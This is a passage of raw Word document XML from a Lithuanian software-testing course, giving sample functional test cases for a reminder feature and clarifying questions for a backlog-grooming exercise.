    <w:p w:rsidR="00016D7B" w:rsidRPr="00AD4464" w:rsidRDefault="00016D7B" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>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4"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="003433A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9134"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Atsakymas:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Abu modeliai numato iteratyvų kūrimą; Abiem atvejais reikalavimai gali būti tikslinami eigoje; panašūs rizikų valdymo principai.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001C2DBE" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="008C5E3F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003433A9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Testuoti funkcinius reikalavimus ir naudoti juos testuojant programinę įrangą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003433A9" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>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FUNKCINIŲ REIKALAVIMŲ NAUDOJIMAS TESTUOJANT PROGRAMINĘ ĮRANGĄ</w:t>
      </w:r>
      <w:r w:rsidR="00B37E76">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Panaudos atvejis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Preliminarus testavimo atvejų sąrašas pateiktam panaudojimo atvejui:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA"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111"/>
        <w:gridCol w:w="4926"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>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26" w:name="_Toc14392518"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Nr.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="326"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4111" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>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27" w:name="_Toc14392519"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Sąlyga</w:t>
            </w:r>
            <w:bookmarkEnd w:id="327"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4926" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>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28" w:name="_Toc14392520"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Laukiamas rezultatas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="328"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>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29" w:name="_Toc14392521"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC1</w:t>
            </w:r>
            <w:bookmarkEnd w:id="329"/>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0" w:name="_Toc14392522"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">Sukurti </w:t>
            </w:r>
            <w:r w:rsidR="00FF41E6" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>įrašą, nustatyti priminimo laiką</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> ateityje.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="330"/>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1" w:name="_Toc14392523"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Priminimas yra sukurtas, tačiau nėra rodomas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="331"/>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2" w:name="_Toc14392524"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="332"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4111" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="333" w:name="_Toc14392525"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Sukurti įrašą, nustatyti priminimą, kurio rodymo laikas yra dabar.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="333"/>
          </w:p>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4" w:name="_Toc14392526"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Uždaryti langą su parodytu priminimu.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="334"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4926" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="335" w:name="_Toc14392527"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Priminimas yra parodomas iškart, kai įrašas yra išsaugomas. Priminime yra rodomas įrašo pavadinimas ir tekstas. Priminimas rodomas atskirame lange.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="335"/>
          </w:p>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6" w:name="_Toc14392528"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Uždarius priminimo langą, priminimas pažymimas kaip peržiūrėtas.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="336"/>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37" w:name="_Toc14392529"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:bookmarkEnd w:id="337"/>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8" w:name="_Toc14392530"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Sukurti priminimą egzistuojančiam įrašui, nustatyti priminimo laiką keliomis minutėmis į ateitį; uždaryti programą. Po to, kai tos kelios minutės praeis, įjungti programą.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="338"/>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39" w:name="_Toc14392531"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Įjungus programą, turi būti rodomas priminimas apie įrašą.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="339"/>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0" w:name="_Toc14392532"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:bookmarkEnd w:id="340"/>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1" w:name="_Toc14392533"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Sukurti priminimą, kai nėra sukurta nei vieno įrašo.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="341"/>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2" w:name="_Toc14392534"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Programa neturi leisti kurti priminimo be iš anksto sukurto įrašo.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="342"/>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43" w:name="_Toc14392535"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>TC</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:bookmarkEnd w:id="343"/>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4" w:name="_Toc14392536"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Pasirinkti priminimą, kuris dar nebuvo parodytas vartotojui, nustatyti jį kaip pasikartojantį. Patikrinti, ar priminimas rodomas daugiau kaip vieną kartą, ir nėra pažymimas kaip peržiūrėtas, jei tai ne paskutinis rodymas.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="344"/>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5" w:name="_Toc14392537"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Priminimas yra nustatomas kaip pakartotinas, po kelių rodymų (bet ne paskutinio) jis nėra nustatomas kaip peržiūrėtas.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="345"/>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6" w:name="_Toc14392538"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC6</w:t>
            </w:r>
            <w:bookmarkEnd w:id="346"/>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7" w:name="_Toc14392539"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Redaguoti turimą pasikartojantį priminimą, kuris vieną kartą jau buvo parodytas vartotojui, nustatyti priminimą, kaip nepasikartojantį.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="347"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4926" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="348" w:name="_Toc14392540"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidR="002476F3" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>riminimas yra parodomas dar vie</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r w:rsidR="002476F3" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ą</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> kartą, po to, kai buvo nuimtas pasikartojimas.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="348"/>
          </w:p>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49" w:name="_Toc14392541"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Pastaba: gali būti ir taip, kad priminimas iškart bus pažymėtas kaip peržiūrėtas (priklauso nuo konkrečios imolementacijos).</w:t>
            </w:r>
            <w:bookmarkEnd w:id="349"/>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50" w:name="_Toc14392542"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:bookmarkEnd w:id="350"/>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7B494B" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="351" w:name="_Toc14392543"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Red</w:t>
            </w:r>
            <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>aguoti priminimo laiką, priminimui, kuris jau buvo parodytas vartotojui ir yra pažymėtas kaip peržiūrėtas. Nustatyti priminimo laiką ateityje.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="351"/>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2" w:name="_Toc14392544"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Paredagavus jau peržiūrėta (vienkartinį) priminimą ir nustačius jam ateities datą, jis yra vėl aktyvus ir atėjus nustatytam laikui, jis yra parodomas vartotojui. Po priminimo lango uždarymo, šis priminimas yra pažymimas kaip peržiūrėtas.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="352"/>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53" w:name="_Toc14392545"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC8</w:t>
            </w:r>
            <w:bookmarkEnd w:id="353"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="411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4" w:name="_Toc14392546"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Nustatyti priminimo laiką praeityje</w:t>
            </w:r>
            <w:bookmarkEnd w:id="354"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492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5" w:name="_Toc14392547"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Sistema neleidžia priminimui nustatyti praeities laiko.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="355"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pastaba: nors kiti scenarijai nėra nurodyti, apie juos taip pat reikia pagalvoti.</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3433A9" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>„BACKLOG GROOMING“</w:t>
      </w:r>
      <w:r w:rsidR="00B37E76">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Galimi papildomi klausimai reikalavimui Nr. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kokią informaciją apie tiekėju</w:t>
      </w:r>
      <w:r w:rsidR="00EF6E3A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s turime saugoti duomenų bazėje?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Ar saugome duomenis tik apie tiekėjus, iš kurių buvo įgytos prekės, ar saugome duomenis apie visus tiekėjus? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
